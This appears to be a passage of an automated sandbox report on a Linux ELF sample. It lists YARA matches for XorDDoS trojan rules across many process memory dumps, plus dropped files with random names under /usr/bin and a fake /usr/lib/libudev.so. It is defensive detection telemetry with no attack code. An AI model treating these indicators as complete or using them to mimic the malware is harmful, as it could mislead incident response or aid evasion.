        Source: Yara matchFile source: 6315.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6533.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6204.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6488.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6329.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6382.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6249.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6312.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6282.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6542.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6320.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6424.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6456.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6496.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6323.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6317.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6441.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6206.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6277.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6268.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6204, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6206, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6207, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6208, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6238, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6241, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6244, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6246, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6249, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6257, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6260, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6263, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6265, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6268, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6274, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6277, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6279, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6282, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6285, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6312, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6315, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6317, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6320, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6323, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6329, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6332, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6335, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6337, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6340, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6346, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6349, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6351, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6354, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6357, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6363, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6366, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6368, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6371, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6374, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6382, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6385, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6388, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6390, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6393, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6402, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6405, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6408, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6411, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6414, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6419, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6422, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6424, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6427, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6430, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6436, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6439, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6441, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6444, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6447, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6453, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6456, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6458, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6461, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6464, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6470, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6473, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6475, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6478, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6482, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6488, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6491, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6494, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6496, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6499, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6505, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6508, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6510, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6513, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6516, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6524, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6527, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6529, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6533, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: 1.elf PID: 6535, type: MEMORYSTR
        Source: Yara matchFile source: /usr/bin/ssrfvzfvpk, type: DROPPED
        Source: Yara matchFile source: /usr/bin/uaewjndswe, type: DROPPED
        Source: Yara matchFile source: /usr/bin/cpbnjarskl, type: DROPPED
        Source: Yara matchFile source: /usr/lib/libudev.so, type: DROPPED
        Source: Yara matchFile source: /usr/bin/wxysocrflf, type: DROPPED
        Source: Yara matchFile source: /usr/bin/efgdvbpuxx, type: DROPPED
        Source: Yara matchFile source: /usr/bin/ccxfvtbhgr, type: DROPPED
        Source: Yara matchFile source: /usr/bin/lkzqkklpfr, type: DROPPED
        Source: Yara matchFile source: /usr/bin/ezztyrfjzf, type: DROPPED
        Source: Yara matchFile source: /usr/bin/dyuvutukki, type: DROPPED
        Source: Yara matchFile source: /usr/bin/vapcvdizxx, type: DROPPED
        Source: Yara matchFile source: /usr/bin/nxattrsdxm, type: DROPPED
        Source: Yara matchFile source: /usr/bin/bjhrrojebv, type: DROPPED
        Source: Yara matchFile source: /usr/bin/vlteqhfomz, type: DROPPED

        System Summary

        barindex
        Source: 1.elf, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 1.elf, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 1.elf, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 1.elf, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 1.elf, type: SAMPLEMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 1.elf, type: SAMPLEMatched rule: Rule to detect XOR DDos infection Author: Akamai CSIRT
        Source: 1.elf, type: SAMPLEMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6475.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6444.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6419.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6244.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6263.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6368.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6285.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6332.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6257.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6274.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6260.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6494.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6238.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6458.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6478.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6535.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6335.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6357.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
        Source: 6385.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Detects XORDDoS Author: ditekSHen
        Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
        Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_0eb147ca Author: unknown
        Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
        Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_ba961ed2 Author: unknown
        Source: 6516.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Xorddos_2084099a Author: unknown
